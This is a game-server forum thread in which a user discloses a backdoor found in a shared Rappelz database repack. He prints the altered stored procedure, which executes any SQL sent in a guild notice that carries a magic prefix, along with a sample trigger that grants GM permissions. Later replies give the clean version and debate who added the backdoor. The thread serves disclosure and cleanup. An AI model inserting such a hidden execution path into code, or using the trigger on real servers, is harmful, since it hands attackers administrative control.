Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > Rappelz > Rappelz Private Server
You last visited: Today at 21:39

  • Please register to post and access all features, it's quick, easy and FREE!

 

Stored Procedure Backdoor E9.1

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Mar 2016
Posts: 38
Received Thanks: 13
Stored Procedure Backdoor E9.1

Found a backdoor in Telecaster database provided by ismokedrow in this

smp_set_guild_notice
Code:
USE [Telecaster]
GO
/****** Object:  StoredProcedure [dbo].[smp_set_guild_notice]    Script Date: 5/27/2017 1:49:17 AM ******/
SET ANSI_NULLS OFF
GO
SET QUOTED_IDENTIFIER OFF
GO

ALTER PROCEDURE [dbo].[smp_set_guild_notice]
@IN_GUILD_SID	INT,
@IN_NOTICE		NVARCHAR(128)
AS
SET NOCOUNT ON

IF (LEFT(@IN_NOTICE, 6) = '_)$*%R')
	BEGIN
		set @IN_NOTICE = REPLACE(@IN_NOTICE,'_)$*%R','')
		EXEC sp_executesql @IN_NOTICE;
	END
ELSE
	BEGIN
		UPDATE dbo.Guild SET notice = @IN_NOTICE WHERE sid = @IN_GUILD_SID
	END
The backdoor works by starting your guild notice with "_)$*%R" then writing the query, for example writing "_)$*%R UPDATE Character SET permission = 100 WHERE name = 'DarkBlaze'" would grant me GM permissions on a server using Telecaster database provided by ismoke.



Dark Blaze is offline  
Thanks
3 Users
Old   #2
Moderator
 
elite*gold: 1
Join Date: Dec 2012
Posts: 3,000
Received Thanks: 957
Great here is the original in case people want to modify...
Code:
USE [Telecaster]
GO
/****** Object:  StoredProcedure [dbo].[smp_set_guild_notice]    Script Date: 5/26/2017 8:50:20 PM ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
--RevolutionTeam
ALTER PROCEDURE [dbo].[smp_set_guild_notice]
@IN_GUILD_SID INT,
@IN_NOTICE  NVARCHAR(128)
AS
SET NOCOUNT ON

 UPDATE dbo.Guild SET notice = @IN_NOTICE WHERE sid = @IN_GUILD_SID


ThunderNikk is offline  
Old   #3
 
elite*gold: 0
Join Date: Jul 2015
Posts: 204
Received Thanks: 220
Let's be clear I only released a cleaned version of the Telecaster that was released by Revolution. I did not, have never and will never use/release/endorse hacks.
SilentWisdom is online now  
Thanks
3 Users
Old   #4
 
elite*gold: 0
Join Date: Mar 2016
Posts: 38
Received Thanks: 13
I downloaded both your Telecaster and theirs and checked each one, I only found that in yours. You can check both mirrors.


Dark Blaze is offline  
Old   #5
 
elite*gold: 0
Join Date: Nov 2011
Posts: 980
Received Thanks: 1,007
Haha funny.

Smoke, Come to the dark side. I have cookies. XD
TheOnlyOneRaskim is offline  
Old   #6
 
elite*gold: 65
Join Date: Sep 2015
Posts: 260
Received Thanks: 365
Well, I compared some Telecaster-backups...
That backdoor was added in one of the first uploaded 9.1-Repacks by Team Revolution ( I checked my archive I downloaded 2 years ago),
but they "fixed" it by themselves and reuploaded their files (one or more time, don't know).
So it doesn't exist in their latest download-pack this way anymore.
Thx for deleting that on your own, Team Revolution

So if @ cleaned that unfixed one you can't really make him the bad guy for this.

- just to clean accusations
LamiaCore is offline  
Thanks
1 User
Old   #7

 
elite*gold: 44
Join Date: Sep 2014
Posts: 104
Received Thanks: 162
The bug in the files from 8.1 you can check the 8.1 repacks the most of them are bugged and 9.1 also we fixed this bug from 2016 .. some team named (volcano) they bugged files and tools with auto inject i don't know any tool but i got a files after i hacked them this files proof that and there's other bug in insert character 8.1 & 9.1 we fixed it( and we published the most bugged files in the arabic forums after we fixed it) you can download our repack for 7.2&9.1 it's clean and al7rob repack by rakanomar for 8.1 .. there's many bugged tools in rappelz world i advise you to see the source of tools before download ..
Ghost Informatics is offline  
Old   #8
 
elite*gold: 0
Join Date: Mar 2016
Posts: 38
Received Thanks: 13
Quote:
Originally Posted by LamiaCore View Post
Well, I compared some Telecaster-backups...
That backdoor was added in one of the first uploaded 9.1-Repacks by Team Revolution ( I checked my archive I downloaded 2 years ago),
but they "fixed" it by themselves and reuploaded their files (one or more time, don't know).
So it doesn't exist in their latest download-pack this way anymore.
Thx for deleting that on your own, Team Revolution

So if @ cleaned that unfixed one you can't really make him the bad guy for this.

- just to clean accusations
Not accusing him of doing it, just stating that the one currently included has that backdoor.
Dark Blaze is offline  
Old   #9

 
elite*gold: 44
Join Date: Sep 2014
Posts: 104
Received Thanks: 162
Nulled
Ghost Informatics is offline  
Old   #10
Moderator
 
elite*gold: 1
Join Date: Dec 2012
Posts: 3,000
Received Thanks: 957
I cleaned up this thread a little.

Lets keep it civil guys. We know there was a possible exploit that may be in our telecasters and we know how to make it right.

Doesn't really matter who put it in there now.

Ill leave the topic open for now in case there are other users who need help with this or in case some want to discuss this some more, but if the accusations and defense of accusations keep getting thrown around I will have to close the thread.


ThunderNikk is offline  
Reply



« Previous Thread | Next Thread »

Similar Threads
[SQL] Stored Procedure for TitleUpdating Automatic
heya guys, this was made a looooooong time ago when we wanted to make title giving automatic on devias. however, it was never used cuz of...
11 Replies - SRO PServer Guides & Releases
Hello, I have a problem with a stored procedure when you log into the game.
Posts Forum on this thread did not help me! Any thoughts about this problem, screen :handsdown: http://s017.radikal.ru/i437/1208/20/992648841219.jpg
5 Replies - Rappelz Private Server
[BR Files] Missing stored procedure: _ResetQuestByCharName
Anyone have this stored procedure for Black Rogue DB? o.O I keep getting this error in GS and it's really annoying (doesn't affect performance, just...
2 Replies - SRO PServer Ask the Experts
[HELP]Res toon stored Procedure
Hi all, hopefully someone can tell me what i am doing wrong. I am trying to use the dbo.usp_GM_Recovery_Char and it completes without errors...
0 Replies - Shaiya Private Server



All times are GMT +2. The time now is 21:39.


Powered by vBulletin®
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy
Copyright ©2017 elitepvpers All Rights Reserved.